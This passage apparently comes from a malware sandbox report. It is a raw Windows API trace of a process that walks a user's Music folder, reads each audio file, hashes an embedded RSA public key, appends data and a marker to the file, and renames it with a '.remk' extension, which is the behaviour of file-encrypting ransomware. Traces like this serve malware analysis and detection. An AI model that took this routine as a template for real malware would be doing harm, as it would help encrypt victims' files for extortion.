hHeap=0x630000) returned 1 [0232.640] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c134e10, ftCreationTime.dwHighDateTime=0x1d5e262, ftLastAccessTime.dwLowDateTime=0x92845d80, ftLastAccessTime.dwHighDateTime=0x1d5dabd, ftLastWriteTime.dwLowDateTime=0x92845d80, ftLastWriteTime.dwHighDateTime=0x1d5dabd, nFileSizeHigh=0x0, nFileSizeLow=0x18e4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OVbE.m4a", cAlternateFileName="")) returned 1 [0232.641] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\OVbE.m4a") returned=".m4a" [0232.641] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\OVbE.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ovbe.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0232.642] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=6372) returned 1 [0232.642] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0232.645] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x18be, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0232.645] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0232.647] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x18e4, lpOverlapped=0x0) returned 1 [0232.648] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0232.648] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0232.648] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0232.648] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694398) returned 1 [0232.649] CryptCreateHash (in: hProv=0x694398, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0232.649] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0232.649] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0232.649] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0232.649] GetLastError () returned 0x0 [0232.650] CryptDestroyHash (hHash=0x31de170) returned 1 [0232.650] CryptReleaseContext (hProv=0x694398, dwFlags=0x0) returned 1 [0232.650] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0232.650] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0232.650] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0232.650] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0232.650] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0232.650] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1db0 [0232.650] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x325d6d0 [0232.650] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee1f0 | out: hHeap=0x630000) returned 1 [0232.650] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee208 | out: hHeap=0x630000) returned 1 [0232.650] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee250 | out: hHeap=0x630000) returned 1 [0232.650] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ec670 | out: hHeap=0x630000) returned 1 [0232.650] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325d6d0 | out: hHeap=0x630000) returned 1 [0232.650] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee250 [0232.650] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72feb0 [0232.650] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ee208 [0232.651] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ee8 [0232.651] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x31ee1f0 [0232.651] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fea0 [0232.651] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x31c0f10 [0232.651] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0232.651] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6930 [0232.651] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f08 [0232.651] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x31f6b30 [0232.651] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f28 [0232.651] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0232.651] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0232.651] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee208 | out: hHeap=0x630000) returned 1 [0232.651] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0232.651] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee1f0 | out: hHeap=0x630000) returned 1 [0232.651] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0232.651] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0232.651] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee250 | out: hHeap=0x630000) returned 1 [0232.651] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0232.651] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d69f0 | out: hHeap=0x630000) returned 1 [0232.651] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b1db0 | out: hHeap=0x630000) returned 1 [0232.651] GetCurrentThreadId () returned 0x314 [0232.651] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x31c0f10 [0232.651] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x37b9110 [0232.651] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x31a8ac8 [0232.652] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x694398 [0232.652] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x31a4298 [0232.652] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0232.652] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fea0 [0232.652] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3192918 [0232.652] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0232.652] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0232.652] GetCurrentThreadId () returned 0x314 [0232.652] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0232.652] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0232.652] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x65dd10 [0232.652] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0232.652] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0232.652] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0232.652] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0232.652] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0232.652] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x65dd10 [0232.652] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0232.652] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x31b5968 [0232.652] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0232.652] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x6a7330 [0232.652] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0232.652] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee250 [0232.653] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0232.653] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0232.653] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0232.653] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed18 [0232.653] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed28 [0232.653] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f758 [0232.653] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f768 [0232.653] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f778 [0232.653] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee1f0 [0232.653] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0232.653] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72ff00 [0232.653] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0232.653] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0232.653] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f788 [0232.653] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f798 [0232.653] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f7a8 [0232.653] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee208 [0232.653] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f798 | out: hHeap=0x630000) returned 1 [0232.653] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ee8 [0232.653] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f788 | out: hHeap=0x630000) returned 1 [0232.653] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee1d8 [0232.653] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f7a8 | out: hHeap=0x630000) returned 1 [0232.653] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee268 [0232.653] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0232.654] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fee0 [0232.654] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f768 | out: hHeap=0x630000) returned 1 [0232.654] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee238 [0232.654] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0232.654] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee220 [0232.654] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0232.654] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ee280 [0232.654] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee220 | out: hHeap=0x630000) returned 1 [0232.654] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ee220 [0232.654] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee238 | out: hHeap=0x630000) returned 1 [0232.654] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x68ed18 [0232.654] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0232.654] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ea8 [0232.654] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0232.654] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ec8 [0232.654] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee1f0 | out: hHeap=0x630000) returned 1 [0232.654] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee1f0 [0232.654] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0232.654] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x325fd48 [0232.654] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee250 | out: hHeap=0x630000) returned 1 [0232.654] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6d60 [0232.654] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee280 | out: hHeap=0x630000) returned 1 [0232.654] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x325d6d0 [0232.655] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ec8 | out: hHeap=0x630000) returned 1 [0232.655] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x31b6580 [0232.655] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed28 | out: hHeap=0x630000) returned 1 [0232.655] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6c48 [0232.655] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee1f0 | out: hHeap=0x630000) returned 1 [0232.655] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325d8e8 [0232.655] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6d60 | out: hHeap=0x630000) returned 1 [0232.655] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3195950 [0232.655] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0232.655] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694398 | out: hHeap=0x630000) returned 1 [0232.655] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0232.655] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3195950 | out: hHeap=0x630000) returned 1 [0232.655] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ea8 | out: hHeap=0x630000) returned 1 [0232.655] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6c48 | out: hHeap=0x630000) returned 1 [0232.655] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325d6d0 | out: hHeap=0x630000) returned 1 [0232.655] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325d8e8 | out: hHeap=0x630000) returned 1 [0232.655] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b6580 | out: hHeap=0x630000) returned 1 [0232.655] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f758 | out: hHeap=0x630000) returned 1 [0232.656] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee220 | out: hHeap=0x630000) returned 1 [0232.656] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x18e4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0232.656] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0232.656] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0232.656] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0232.656] CloseHandle (hObject=0x640) returned 1 [0232.658] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711898 [0232.658] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x870) returned 0x37b5b70 [0232.658] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\OVbE.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ovbe.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\OVbE.m4a.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ovbe.m4a.remk")) returned 1 [0232.660] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7e8fc660, ftCreationTime.dwHighDateTime=0x1d5da78, ftLastAccessTime.dwLowDateTime=0x8d67e570, ftLastAccessTime.dwHighDateTime=0x1d5d7b0, ftLastWriteTime.dwLowDateTime=0x8d67e570, ftLastWriteTime.dwHighDateTime=0x1d5d7b0, nFileSizeHigh=0x0, nFileSizeLow=0x8bfa, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="qIBVS54In6hNtRDm0Wt.m4a", cAlternateFileName="QIBVS5~1.M4A")) returned 1 [0232.660] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5968 [0232.660] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x694398 [0232.661] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\qIBVS54In6hNtRDm0Wt.m4a") returned=".m4a" [0232.661] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\qIBVS54In6hNtRDm0Wt.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\qibvs54in6hntrdm0wt.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0232.661] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=35834) returned 1 [0232.661] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0232.664] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x8bd4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0232.664] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0232.668] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0232.669] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x8bfa, lpOverlapped=0x0) returned 1 [0232.670] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0232.670] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x31c0d08 [0232.670] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0232.670] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0232.670] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x695278) returned 1 [0232.671] CryptCreateHash (in: hProv=0x695278, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0232.671] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0232.671] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0232.671] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0232.671] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0232.671] GetLastError () returned 0x0 [0232.671] CryptDestroyHash (hHash=0x31de170) returned 1 [0232.671] CryptReleaseContext (hProv=0x695278, dwFlags=0x0) returned 1 [0232.671] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0232.671] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | 